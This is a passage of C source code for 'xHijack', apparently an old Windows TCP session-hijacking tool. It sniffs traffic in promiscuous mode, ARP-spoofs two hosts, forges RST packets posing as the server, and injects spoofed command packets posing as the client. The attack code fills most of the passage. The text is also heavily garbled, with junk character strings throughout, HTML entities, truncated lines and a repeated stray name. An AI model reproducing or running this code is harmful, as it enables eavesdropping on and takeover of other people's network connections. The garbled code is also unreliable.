pTmp; # A; w( a5 P4 R' b9 G8 t2 Y PIP_ADDR_STRING pIPAddr; : s+ n9 \' d: z6 e/ v, b //Get The list of Adapter & }% `4 ]1 n$ W$ d/ G G if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) : Q. c, {. W3 b, n% o$ b { printf("Unable to retrieve the list of the adapters!\n"); return 0; } + G: \& C3 ?+ `2 P* J6 U% M. `/ k7 E temp = temp1 = AdapterName; + ~; }7 q4 s B A% z+ N4 S2 t* v3 l i = 0; while ((*temp != '\0')||(*(temp-1) != '\0')) { 7 ~0 u4 g$ F! Q' X& a- o/ B9 k: ` if (*temp == '\0') { 3 G) s9 |) _: _& w: X+ l memcpy(AdapterList,temp1,(temp-temp1)*2); * M3 w" k/ P! C+ _4 l6 x printf("%d - %S\n", i+1, AdapterList); * [% p) [5 H# O$ \' H2 _1 X6 D1 K; G temp1=temp+1; n1 R7 ?/ V0 l c3 t! f i++; } temp++; } //choose adapter % _* \$ U; P1 n, E& Z while((iAdapter <= 0) || (iAdapter > i)) { printf("\nPlease choose your Adapter:"); scanf("%1d", &iAdapter); 3 L) o" C9 w* f' A8 F } 7 c6 ` y1 F5 m7 H$ t) \" X7 W4 Z printf("\n"); , N. g9 V0 C1 w, g //---------------------------------------------// / d2 l3 x& i- q( ~0 z' o* H2 N //这里调用iphlpapi来取得本地ip_addr和mac_addr 8 A& A' ]; N) b, e- `- `( u sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); + B, c; ^3 l% L- ` dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); 5 t- F. t! h4 j* K9 M/ h if(dwRet != ERROR_BUFFER_OVERFLOW) & w% S. m. h, R$ J" }: F { 3 L$ \, g: Q' T. @1 [/ U printf("GetAdapterInfo error:%d\n", GetLastError()); : l \( M7 M9 A. U: i7 W6 ~ return 0; 3 g& a5 @5 m \1 n0 B% Z } pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); ! \$ y# g. j, H7 c/ m9 W: ^ if(!pAdapterInfo) O$ E# ]0 g1 q { printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); - X( ^- M6 J9 i. a return 0; # ?. K! G' G1 S' U3 j6 s2 D } dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_SUCCESS) { 9 d" n4 z$ ^) g) X printf("GetAdapterInfo error:%d\n", GetLastError()); return 0; $ W) C9 s$ g( w! i" B, M } pTmp = pAdapterInfo; 9 H: m+ H2 a. e while(pTmp) ) l7 Z0 e$ l! c- { { //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) 8 Q' V! Y1 }$ |) ?! _7 E6 L4 R { ( e9 H S( Q8 k# P8 T //found it,get own adapter mac address * ^+ G: U% {* H9 U memcpy(g_szOwnMAC, pTmp->Address, 6); //get ip address : N6 B6 m6 [$ K) b8 p8 ^, R pIPAddr = &pTmp->IpAddressList; . i3 J- F$ _7 c1 {/ b. F4 r, H while(pIPAddr) { g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); pIPAddr = pIPAddr->Next; 3 T" m* `( a7 G1 h. k9 {( k if(g_TotalIP >= Max_Num_IPAddr) break; + J F0 n6 J0 ~/ T8 ^ } break; } pTmp = pTmp->Next; } free(pAdapterInfo); //not found,return zero if( (!pTmp) || (!g_TotalIP) ) return 0; //---------------------------------------------// 4 j. U) P% Q, S9 d- C //open adapter lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) , x4 b1 j! A; Z { Q; q- Z: R0 ]; [: M9 c: d1 } iRetCode = GetLastError(); 4 U. p9 f, j, _1 {1 R printf("Unable to open the driver, Error Code : %lx\n", iRetCode); return 0; } % M; r" C! Q% A' g: q) M9 R // set the network adapter in promiscuous mod if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) { printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); ) f8 Q h/ |: f; v4 U/ k2 A0 X& C if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) 1 E& ?( c9 ]* p, s3 J4 ` { printf("Unable to set ALL_LOCAL mode!\n"); 1 V9 z/ V! U! n$ l9 m return 0; - _! ]7 ?, j. n& j } 8 R% Z4 K' Y/ S# ?# j7 i+ b; @! N } // set a 512K buffer in the driver 4 t$ B) U3 n2 {/ G5 O+ o; n if(PacketSetBuff(lpAdapter, 512000) == FALSE) { printf("Unable to set the kernel buffer!\n"); return 0; } // set a 1 second read timeout if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) printf("Warning: unable to set the read tiemout!\n"); if(PacketSetNumWrites(lpAdapter, 1) == FALSE) printf("warning: Unable to send more than one packet in a single write!\n"); ' U6 v% B5 n& V //设置发送的packet g_lpSendPacket = PacketAllocatePacket(); / x2 ]( Z2 T; a* n if(g_lpSendPacket == NULL) { ( t) \! B2 G: k$ t' T3 s* B printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); return 0; 6 q1 d6 C; R* R0 z# z } 9 t9 a/ a3 ]- H# q ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); return lpAdapter; } % b! S2 q) x; m: e( [0 z. }4 ^( I//功能：帮助信息 ; q0 b3 q# ]1 \/ ~- M U1 xvoid usage() ; _# N* ?9 ?, Q6 N5 _( S5 A: g; `{ printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" + _* K4 V: o5 U* W( K* r "By eyas 2002/8/19\n" "http://www.ey4s.org\n" "Thanks to Refd0m and shotgun\n\n" ) h& ~3 M7 H& N; K3 o$ L; J5 [ "Usage: xHijack ServerSide ClientSide\n\n"); 6 s) v* t; @! [2 L! B( e9 L} ! r. Z1 f$ n: k( F// //功能：显示数据包的一些详细信息 // - R& r; n! H. M; HVOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) { SOCKADDR_IN saDest, saSrc; unsigned char FlagMask; int i; saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; + S. a1 g0 N/ ^5 k printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), 1 o$ X# }+ E/ ~4 d j/ S7 g ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); 3 o+ N+ F: S' E //display TCP flag for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) 7 U8 f) h: Z' d3 R { if((pTCPPacket->tcphdr.th_flag) & FlagMask) # Z. \3 P& n- l6 o& s8 A2 k printf("%c", g_szTcpFlag); 7 W, x7 H4 y2 B, r5 V else printf("-"); } printf("\n"); //如有需要，可显示更多详细的信息 if(bDetail) $ e' ]6 Q& Z8 _+ r printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); } // ! b+ B z! X; I+ g% a//功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 // DWORD WINAPI AnalysePacketsThread(LPVOID lp) % H0 J% Z8 H# [% G2 p3 V{ $ r! R6 p2 ^# K9 V/ P6 x6 h" T8 Y* z5 z ULONG ulBytesReceived; USHORT usDataLen; . ^; f3 H9 T2 Z& ~ g9 Y% a) v4 J+ t# [ //USHORT usIPHeadLen, usTCPHeadLen; ( ~+ B1 ^1 J' c% ?4 S F( z5 U char *buf; $ z% A& {5 Y, F1 z. p u_int off, i; PTCPPACKET pTCPPacket; struct bpf_hdr *hdr; LPPACKET lpRecvPacket; ( |7 d; f) A& w5 w char szPacketBuf[256000], *pStr; 4 H% m' S k B$ L BOOL bDeleteNode, bAddNew; DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 BOOL bClientToServer;//数据包是否从客户端发送到服务器端 , z! L" ~* E* y* U //设置接收的packet 4 y9 I1 A# M( M. T0 b lpRecvPacket = PacketAllocatePacket(); if(lpRecvPacket == NULL) 0 \1 j/ I% r7 _, ~ { printf("Error:failed to allocate the LPPACKET structure for recv.\n"); # ]* A% K1 Q# W& p7 x' X return 0; 0 }% ^; O" y1 L) H, v } ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); ! t+ v- n% t: ~! z7 k: {3 c PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); while(1) 4 Y' Z& @5 N8 u; ?' V { // capture the packets : Q* w0 o6 ]6 j8 h4 J Y$ j if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) / f; R) b$ T9 b/ [5 H { printf("Error: PacketReceivePacket failed.\n"); 8 p( R* Z' `2 M% C break; " N+ S1 v- p8 n } ulBytesReceived = lpRecvPacket->ulBytesReceived; % o4 V( N* W/ i% e( [0 k: _" n& W buf = lpRecvPacket->Buffer; off = 0; while(off < ulBytesReceived) { ; k; ?& g" T$ y hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; pTCPPacket = (PTCPPACKET)(buf + off); off = Packet_WORDALIGN(off + hdr->bh_caplen); & t" _) e' |: _$ `3 E+ O //不需要处理自己发出的包(转发或本机发送的) 1 c) A4 W8 l z2 v if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; //检查是否IP包 if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; //检查是否TCP包 if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; " ^5 O2 X3 J# ^+ t9 [ //也不处理DestIP是自己的包 for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
( V# v* M' ?3 h7 K8 O+ P            //reset action flag
8 T" V7 n) P' B( G7 ~0 w7 z+ h# ~            ResetActionAllFlag();
0 S) q, `# ]5 I% H4 {$ S/ O          }
/ f: x8 t( C0 S3 b6 V          //start hijack
          else if(g_dwAction == ACTION_HIJACK)
! L1 W8 h% G) i          {
            //send rst packet to client
            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
            //send hijack packet to client
0 Z/ q7 J" o) N3 H* i7 q3 Z, m. s/ p            SendHiJackPacket(pTCPPacket);
: p0 v, t2 h0 {            //reset action flag
            ResetActionAllFlag();
          }
        }
( v7 n& c8 D) n( r8 `        //show the tcp data
1 a  ~" d0 V3 m0 j$ r        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
        {
          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
          //暂不考虑IP、TCP头不是20字节的情况
# Y# m4 `) v2 k: o! p7 x! _          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
          pStr = (char *)pTCPPacket + 54;
1 i: d* m% k; {; W% @2 Z4 _          for(i=0; i        }
1 d+ A8 T* m- ?+ e/ F" C      }
' D, s$ {  G; j3 x1 @0 M      //debug output
      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
    }//end of analyse packets while
3 t# t  ~, Q; O; m) Y  }//end of recv packets while
  PacketFreePacket(lpRecvPacket);
' B" R5 I: F3 v0 [1 A) C. o  return 0;
9 Y# \& p* G+ q) \}
5 Y9 M4 Y4 \! `% g
( K9 v9 F% \; c& F& ?3 i; P) r/ f8 C
, N7 I/ H' r  x* ?//
! f3 ]! ~' H* A( c* K//功能：操作记录所有连接信息的单向链表
//
9 i) a9 [% b3 i: ~DWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
" q/ x. f. S8 h. U( P{
  PCONNINFO  pNew, pTmp;

  pTmp = g_pConnHead;
# z# _0 W( t) v; {6 N  while(pTmp)
) F7 J/ B) V: w4 m0 T% }7 U/ N  {
    if(pTmp-&gt;bActive)
: R1 c; b  K4 P9 X( s9 V  r    {
      //found it
. z4 [0 Y% H9 d2 w$ }% D$ }8 P2 }      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
        (pTmp-&gt;uClientPort == uClientPort) )
6 j; ?- g$ k* c: ?$ g      {
        if(bDelete)
/ ^( d! S6 `9 ?8 S5 J        {
7 U2 }/ N$ Z  q" Y; ~; C          pTmp-&gt;bActive = FALSE;
, L7 z6 L% I9 }/ p! I4 u' b0 C9 N          return 0;
: V" ~2 }- k# w7 ^        }
2 Z/ i. ?! ^: X( ~        else return pTmp-&gt;ident;
* ]1 O7 L  U( a4 r3 M) C) o      }
6 X' a  _3 L3 ?5 a* h5 w* ~7 T( o& O    }
    pTmp = pTmp-&gt;Next;
  }
2 p" N8 U3 v0 x, k  //not found, create new node
  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
  {
    //search unactive note
' i, P6 e9 E, U) m* k1 T2 s    pTmp = g_pConnHead;
    while(pTmp)
8 q( N% w2 l5 x# L7 G5 Y( f9 W    {
      if(!pTmp-&gt;bActive) break;
      pTmp = pTmp-&gt;Next;
    }
    //found a unactive node
    if(pTmp)
    {
5 w# R" d! F! P0 j      pTmp-&gt;dwServerIP = dwServerIP;
      pTmp-&gt;uServerPort = uServerPort;
  p: L+ l" Z" B6 W- d+ }# p* [      pTmp-&gt;dwClientIP = dwClientIP;
6 O* Y( ^, `  X" d6 K      pTmp-&gt;uClientPort = uClientPort;
      pTmp-&gt;bActive = TRUE;
      return pTmp-&gt;ident;
    }
, K1 {; T* T1 d5 f% b; D$ E: d8 C    //not found,create new node
" I2 l! Y2 K7 X8 v2 X, {5 D% m5 d1 n    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
    if(!pNew)
    {
      printf("malloc for link node error:%d\n", GetLastError());
4 U9 x4 u! u% B9 b  W9 e9 W# `      return 0;
- V( C7 P2 T4 x- y! ?% O    }
9 E" D# s! {+ K* ~5 Y& W    //fill the struct
! o6 x% I; Z& X% ~4 L% e( Y8 t; M: R    pNew-&gt;bActive = TRUE;
5 s9 ^. k6 `. d; D* d7 l3 W  U    pNew-&gt;dwServerIP = dwServerIP;
    pNew-&gt;uServerPort = uServerPort;
! B1 h# @: `; I* T. C    pNew-&gt;dwClientIP = dwClientIP;
+ J- k3 O. l4 Q3 s$ L    pNew-&gt;uClientPort = uClientPort;
    pNew-&gt;ident = ++g_ident;
    pNew-&gt;Next = NULL;
    //add new node to link
    if(!g_pConnHead)
      g_pConnHead = g_pConnLast = pNew;
    else
    {
' L3 B0 C9 R7 d- L      g_pConnLast-&gt;Next = pNew;
      g_pConnLast = pNew;
& t( z1 ^+ u8 q% E# j0 J    }
" c  j' B+ u; S' G6 M4 l    return pNew-&gt;ident;
  }
  return 0;
}

//
+ J' K9 a+ [2 [: J. E: J" E//功能：判断一个数据包是不是只有ACK标志
//
5 ]8 D1 Z+ y- Q( b: K0 [; XBOOL IsACKPacket(unsigned char flag)
% @/ z* B( a; w( T7 S& s- q. \4 \/ F9 C{
  int  i, j=1;
  for(i=0 ; i&lt;4; i++)
  {
    if(flag &amp; j) return FALSE;
2 y: I$ m) k3 {/ Y8 P    j &lt;&lt;= 1;
  }
  if(!(flag &amp; 0x10)) return FALSE;//is ack?
' W9 v) R! f& _3 b% [, i0 V% ], F  if(flag &amp; 0x20) return FALSE;
6 M- s! u7 m+ m9 n# {* r3 i& f  z  return TRUE;
}
# j1 `7 X' U  I- b7 f/ E. O& w
//
) a8 ?; s! M$ ?* G& E) i  Z//功能：伪装成Client给Server发送数据包
* A! n$ c( \- o( b- Z) i; Q//
4 c. m( O1 e5 IBOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
{

  char    szBuff[1520];
% w* F" ~+ C. I5 w2 V/ C9 `  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
1 M# D! A7 [/ c  BOOL    bRet = FALSE;

  __try
  {
    //
    if(!g_pCurrCtrlConn) __leave;
  ^. F; G  N4 N8 X1 P" M; u    //allocate memory for hijack packet
4 k- I/ T3 p) U2 w' w! p    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
) C) m% l% k( T5 c' ]  Y    if(!pHiJackPacket)
    {
3 G! ~4 S$ A9 D( H, @( W+ K. T( d9 G" ^      printf("malloc error:%d\n", GetLastError());
      __leave;
, r' T$ K( Q: B) Z* B    }
$ ^" g7 |+ m/ J  N    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
    //-------------- modify the packet ---------------//
    //modify ethernet head
    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
3 |& G6 y" L4 N" u    //modify ip head
    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
/ Y1 O4 Y1 Y/ P: S+ {' m    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
# o: v2 `$ ~& C# P7 n    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
3 A& u4 I! ]6 d' L/ |* j    pHiJackPacket-&gt;iphdr.checksum = 0;
    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
' q: q0 [/ _0 r8 X8 s    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
    //modify tcp head
; m3 I7 ]% E9 _/ w4 i    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
9 x8 Q+ @, {- `" K    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
    pHiJackPacket-&gt;tcphdr.th_sum = 0;
    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
    //fill tcp psd head
    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
) `; {6 P7 w7 }! P  |0 d    psdhdr.ptcl = IPPROTO_TCP;
+ N( m2 Y9 w$ _    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
    //calculate tcp checksum     
9 s% G; o' w" O9 E3 K# p7 t" |    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
' a+ m3 S9 O% t( z$ i, j% z8 d    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
( t3 q9 w# j% ^8 F  w' S, u( Z/ l    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
% Q, m$ z+ H$ c8 C5 n! d1 j: l1 s/ x    //calculate IP checksum
    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer           
! B1 P- h3 L0 G# i    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
5 w9 z5 z+ b$ M, Q$ F5 q7 _    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
: |% E+ i: n' U$ e      printf("Error sending the hijack packets!\n");
9 A: l7 n* a; a- _4 O/ M& v5 h      __leave;
    }
    else printf("Send hijack packet ok!\n");
    bRet = TRUE;
) {2 N& j% b; m3 h) O* O' O4 ]  }

韩冰

__finally
  {
    if(pHiJackPacket) free(pHiJackPacket);
  }
* [0 G0 i+ [" t7 h' _! a8 E  return bRet;
: W) l; e4 C6 A9 u! O1 A& `}

! m& R4 G: _" j( i/ X2 [; n
4 j. {/ p; s) X* p3 o9 J0 n3 B//
4 d- p1 w/ h3 l9 Q+ a$ X  |0 H//功能：伪装成Server给Client发送rst包
3 U. s  N" b* ]& [//
' _! u$ t* u! XBOOL SendRstPacket(unsigned int seq, unsigned int ack)
8 s, D# _: a9 W& K/ J{
  char    szBuff[60];
  PSDHDR    psdhdr;
  PTCPPACKET  pTcpPacket = NULL;
1 c, ]& X* d* T  m  BOOL    bRet = FALSE;
6 ~- j1 J/ z0 p+ r% u# v
  __try
% Q# Y2 X0 B, k  {
  ]5 h$ [1 [% M+ ~) D    //检查当前指向想控制的连接的信息的指针是否为空
5 C4 T) |4 k$ |- j; @6 m    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for rst packet
1 g: j3 Q3 k5 \4 `( t6 q    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pTcpPacket)
    {
9 w$ M* K3 b) R9 c4 K! p      printf("malloc error:%d\n", GetLastError());
& S) M3 I% C) E- P! v      __leave;
& E" D$ P0 ]$ X2 M: s2 v# @    }
    //fill ethernet head
    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
* @" x0 l/ g: A; X; |( i    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
9 M+ R% v! n! x( U! T: i* H    //fil ip head
; J# ]9 b3 _/ c2 o9 G+ R. P    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pTcpPacket-&gt;iphdr.tos = 0;
    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
    pTcpPacket-&gt;iphdr.ident = 1;
) T: w4 P; h4 i/ k1 l    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
    pTcpPacket-&gt;iphdr.ttl = 128;
    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
$ B1 [% j+ R- A) F& V$ I* B5 E    pTcpPacket-&gt;iphdr.checksum = 0;
    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
% P! z7 {5 G3 W" p1 X2 u6 y    //fill tcp head
5 J. c! ?2 Z* ?* d    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
, T. w1 e% w  A% t- Q    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
( k) P- P- |2 P) C/ ^& ^    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
. q0 Q, N  @6 A6 L' \8 d3 `    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
( Z, v/ m1 w/ z" L$ ~$ Y    pTcpPacket-&gt;tcphdr.th_win = 0;
    pTcpPacket-&gt;tcphdr.th_urp = 0;
    pTcpPacket-&gt;tcphdr.th_sum = 0;
    //fill tcp psd head
3 [- ~' e' p' H2 {    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
9 \# G1 b: D" C5 {9 o4 q2 H9 u    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR));
7 B& d6 |# R+ P; _    //calculate tcp checksum     
1 B5 S* h9 K* y" o    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
  P. A6 \1 m0 X0 Y4 s5 E! b    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
& r; X& P& u! H5 V' P* X* \/ O    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
( `2 }6 S) k8 s/ n* H) z. T5 Q    //calculate IP checksum
) p+ K# K5 |" F( r; W3 p1 W4 e    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
( ?5 H2 k" T, ~7 T2 P7 y    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
. v4 w( m, H, j+ D+ r! `    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
- C8 x& c; ]) v/ W6 @1 M3 K" u      printf("Error sending the rst packets!\n");
/ ]' r0 O6 O, s( Y" G      __leave;
    }
/ X1 a7 A" R0 W9 q5 X# g  L    else printf("Send RST packet ok!\n");
    bRet = TRUE;
  }
/ O7 K) F$ H7 J: C& ?5 }  __finally
  {
& ?6 l& H' X' J6 Y' q0 D2 d! u  |    if(pTcpPacket) free(pTcpPacket);
  }
  return bRet;
& D+ H; Y8 V2 x4 @9 y- G}

, ~/ p7 N+ D$ ^8 a3 j//
//功能：计算校验和
- `6 l. I: I; n5 g- m//
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size &gt;1) {
- B' J: [1 X3 p6 a/ `  cksum+=*buffer++;
  size -=sizeof(USHORT);
}
if(size ) {
  cksum += *(UCHAR*)buffer;
' b& }4 Y' l8 z+ Z, s; O }
cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
cksum += (cksum &gt;&gt;16);
return (USHORT)(~cksum);
+ m/ K# C9 a. y, x}
& T7 l9 q+ }5 d
//
//功能:实施ARP欺骗
6 j3 U7 D2 c, k7 m//1 告诉ServerSide,ClientSide的mac是ownmac
# `2 G& I9 L: R# S- _//2 告诉ClientSide,ServerSide的mac是ownmac
//
* u7 H5 u  s* b" O' m0 rDWORD WINAPI ArpSpoofThread(LPVOID lpType)
& w2 P# H4 t+ Z{
  int  iType = *(int *)lpType;
- i3 x/ R3 I: j' O7 u  ARPPACKET  ArpPacket;
  LPPACKET  lpArpPacket;
( `" A) e1 }8 d; y4 o9 E  char    szArpBuff[60];
6 K) ]+ C: F  f- }0 I1 t
  switch(iType)
  {
9 e5 x8 O% @0 L2 P- |    case 1:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ServerSideIP;
      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
      break;
    case 2:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
, g+ k3 |& m. g' \& {4 E      ArpPacket.arphdr.DestIP = g_ClientSideIP;
      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
      break;
    default:
& V3 r1 I7 W! \% ?! x9 `      return 0;
  }
  //ethernet head
  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
7 D% ^$ Y) ~. f( Z" T3 u& Q  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
) t. @) v1 y. z: O+ Y* S& h  //arp head
  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
9 c) ?6 Y- c% D' ]  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
+ }/ [2 ?& x! J  b' H* M6 z+ Y  ArpPacket.arphdr.HrdAddrlen = 6;
  ArpPacket.arphdr.ProAddrLen = 4;
6 z& ^- d# D& q% p  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
7 b! r: F2 P  E1 \' C9 e& R  ArpPacket.arphdr.ProType = htons(EPT_IP);
  ArpPacket.arphdr.op = htons(2);//arp reply

0 V% P. d$ [: K! Q% P, |/ C$ N  lpArpPacket = PacketAllocatePacket();
( W4 ]0 t' R  s5 L1 K) c  if(lpArpPacket == NULL)
' h9 q- L& |6 e0 d2 ~  {
    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
    return 0;
/ g5 i. w* G* Z3 d( n/ B& t7 {  }
  memset(szArpBuff, 0, sizeof(szArpBuff));
  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
  //send arp packet
" G7 `, V% B5 Q: p4 e  while(1)
  {
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
0 _4 ]5 s  a+ T& [! @" ~8 h$ C    {
2 e  `4 L0 m$ _      printf("Error sending the arp spoof packets!\n");
